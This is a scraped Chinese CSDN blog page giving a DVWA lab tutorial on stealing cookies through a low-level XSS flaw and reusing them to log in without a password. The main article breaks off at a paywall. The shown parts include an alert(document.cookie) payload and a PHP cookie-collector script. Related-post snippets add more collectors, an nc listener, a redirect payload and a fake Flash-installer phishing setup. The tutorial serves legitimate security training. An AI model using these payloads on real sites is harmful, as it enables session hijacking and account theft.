使用XSS漏洞获取用户cookie并免密登录实验

最新推荐文章于 2024-07-23 19:36:58 发布
最新推荐文章于 2024-07-23 19:36:58 发布
阅读量3.3k 收藏 7
点赞数 2
分类专栏: 网络安全 Web Web安全 文章标签: php 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43395215/article/details/106176676
版权
本文介绍了如何利用DVWA平台的XSS漏洞(LOW等级)获取用户cookie,并通过创建PHP脚本来保存cookie,从而实现免密码登录。讲解了在Web服务器上编写脚本的注意事项,以及如何在用户不知情的情况下触发XSS,演示了如何修改cookie以绕过密码验证直接访问受保护的页面。
摘要由CSDN通过智能技术生成

使用XSS漏洞盗取cookie,并绕过密码登录

首先环境的搭建,使用DVWA平台的XSS漏洞,这个DVWA的XSS漏洞在前面都讲过,所以我们直接使用LOW等级获取cookie,并保存在Web服务器上,这里使用LOW等级是为了方便,其他等级都是一样的做法,只是构造的脚本不同

使用脚本获取cookie

<script>alert(document.cookie)</script>

这是一个很简单的XSS漏洞,可以弹出用户的cookie,但是现在我们不是要将cookie弹出,而是将其保存在其他服务器上,我们可以获取到这个cookie,然后利用cookie绕过密码登录

首先我们编写一个可以获取cookie,并且保存为文件的php文件

<?php

$cookie = $_GET['x'];

$myFile = "cookie.txt";

file_put_contents($myFile, $cookie);

?>

注意:要在目录下写创建或修改文件,一定要有写权限,一般目录的用户是root用户和用户组用户写权限,但是其他用户是没有的,就导致本地可以运行php创建文件,但是通过web就不可以,因为web是服务器平台权限,比如Apache搭建的网站,创建文件就是Apache用户

然后搭建一个我们的网站,用来接收cookie,将上述代码写入名为cookie.php的文件中,并存放在网站根目录下,保证我们可以访问到这个文件`

Cookie.php

<?php

$cooki
最低0.47元/天 解锁文章
初宸
关注
专栏目录
xss获取cookie登陆
weixin_51356351的博客
11-17 1069
实验环境: phpstudy DVWA靶场 实验步骤 1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下: <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将值改的大一点 4、将插入留言板中
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1766
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中 php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
利用xss漏洞窃取cookie登录
热门推荐
黑面狐
08-23 1万+
今天在测试自己产品的时候,发现有个地方输入框执行javascript脚本。 正好趁着这个机会给小伙伴们演示xss的危害。 首先在XSS平台上搭建一个测试项目。 我用的是http://xss.fbisb.com这个的免费平台 项目配置选择默认就可以了。 然后直接复制平台提供的代码到存在xss漏洞的地方 保存以后,我让另一个同事登录,并点击这个模块。 这是XSS
xss平台获取管理员cookie xss flash钓鱼拿到主机控制权
最新发布
weixin_71053667的博客
07-23 407
点击"设置"--"解压后运行"如下两行内容...并在"模式"标签下设置"全部隐藏" 配置更新方式----解压并更新文件而覆盖方式----覆盖所有文件。5.将两个文件一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",点击"高级"标签页下的"自解压选项"填。3.来到xss平台 点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成一个js文件放到我们网站的根目录下面。4.模拟管理员登录后台的操作 登录完成后触发我们插入的恶意代码。# Flash官网下载。
技巧:XSS漏洞结合nc窃取Cookie实现免密码登录
weixin_51339377的博客
04-18 2102
XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!) 如果某天不能用外网,也不能用kali 存储型xss最重要的是获取用户cookie!!!!!!!!!! document.cookie 获取用户所在网站的cookie 1.在黑客端用nc进行监听 nc -lvp 4444 //使用nc监听4444端口 2.XSS注入的恶意script脚本 <script>var img = docum...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1626
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7283
XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1181
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
XSS、CSRF、SSRF漏洞原理以及防御方式
Love_Naive的博客
09-03 5352
这里写目录标题XSSXSS攻击原理:XSS的防范措施主要有三个:编码、过滤、校正CSRFCSRF攻击攻击原理及过程如下:CSRF攻击的防范措施:SSRFSSRF漏洞攻击原理以及方式SSRF漏洞攻击的防范措施XMLXSS、CSRF、SSRF的区别XSS、CSRF的区别 XSS XSS(Cross Site Scripting):跨域脚本攻击。 XSS攻击原理: 不需要你做任何的登录认证,它会通过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、hmtl代码块等)。 X
基于DVWA实现XSS跨站脚本漏洞-反射型、存储型、DOM XSS
weixin_44029504的博客
05-08 1203
什么是XSS跨站脚本漏洞 XSS跨站脚本(Cross-Site Scripting,XSSXSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不足而产生的,当用户浏览这些网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个...
XSS漏洞利用之cookie获取
内心不种满鲜花就会长满杂草
08-01 1万+
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
技术报告:XSS盗取Cookie
Ciyaso的博客
02-16 1783
文章目录第1章 绪 论1.1 XSS1.1.1 XSS的介绍1.1.2 XSS的种类1.2 Cookie1.2.1 Cookie的介绍1.2.2 Cookie的特性1.2.3 Cookie的功用第2章 相关技术与基础知识简介2.1 基本漏洞测试工具2.2 反射XSS盗取Cookie第3章 漏洞检测实时演示3.1 演示环境3.2 演示步骤3.2.1构建盗取链接3.2.2利用cookie会话劫持3.2.3 上传一句话webshell3.2.4进一步信息读取总 结 第1章 绪 论 1.1 XSS 1.1.1
web安全中存储型XSS手动获取cookie信息
qq_63539335的博客
01-14 590
web安全中存储型XSS漏洞,基础手工攻击演示
存储型XSS结合XSS平台获取cookie信息进后台——efucms
W小哥
12-29 5447
实验目的:利用存储型XSS获取管理员Cookie信息,修改本地Cookie信息为管理员Cookie,以管理员身份不输入用户名、密码直接登陆后台 受害者浏览器:谷歌浏览器(也就是网站管理员使用的浏览器) 攻击者浏览器:火狐渗透便捷版浏览器 一、攻击者利用XSS漏洞攻击过程 第一步:使用火狐渗透测试便捷版浏览器打开目标网站 第二步:找到可以发表评论的地方,输入进行XSS测试,看是否弹窗,若弹窗则说明...
登录漏洞
Grey的博客
08-06 7321
继上次登陆框引起的血案这个文章之后,时隔一个月笔者又写了续集,呃……升华版。 0×00 文章内容结构图 0×01 信息泄露 利用泄露的信息可以大大增加我们的可测试点,从而增加我们的成功率。 1. HTML源代码 必看的肯定要属HTML源代码了,源代码里包含了下面所说的JS文件。HTML源代码会泄露很多信息,像程序员未删除的注释、敏感路径等都可能在HTML源代码中找的到,从来增加发现漏...
XSS漏洞详解
weixin_43939527的博客
05-27 2261
每天一个小知识之GET、POST区别 1、GET是从指定的资源请求数据,POST是向指定的资源提交要被处理的数据。 2、GET参数是带在URL后面,POST请求放在请求体Request Body中。 3、GET方法提交的数据大小长度有限制,POST方法没有对长度进行限制。 HTTP协议规范没有对URL长度进行限制。GET方法提交数据大小的限制是特定的浏览器及服务器对它的限制。IE对URL长度的限制是2083字节(2K+35) 4、GET请求能够被cache,POST不进行缓存。 GET请求能够被保存在浏览.
网络安全实验6 认识XSS & 盗取cookie
一半西瓜的博客
01-30 3981
赞赏码 & 联系方式 & 个人闲话 【实验名称】认识XSS&盗取cookie实验目的】 1.了解XSS漏洞 2. 掌握盗取Cookie的方法 【实验原理】 1.什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML...
XSS攻击:获取用户cookie(get方式)
weixin_43726152的博客
05-06 4040
关于XSS攻击是什么,想必大家都知道了,今天围绕百度随便找的一张流程图来完成一个获取用户cookieXSS实验。 为了和上图数字一致好看些,从序号1开始吧 0x1 用户登入 自行登入。坑自己就可以了,不要坑别人哈。 0x2 找到漏洞点,制作一个危险的url 让前端插入的js是: <script>document.location = 'http://127.0.0.1/pik...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值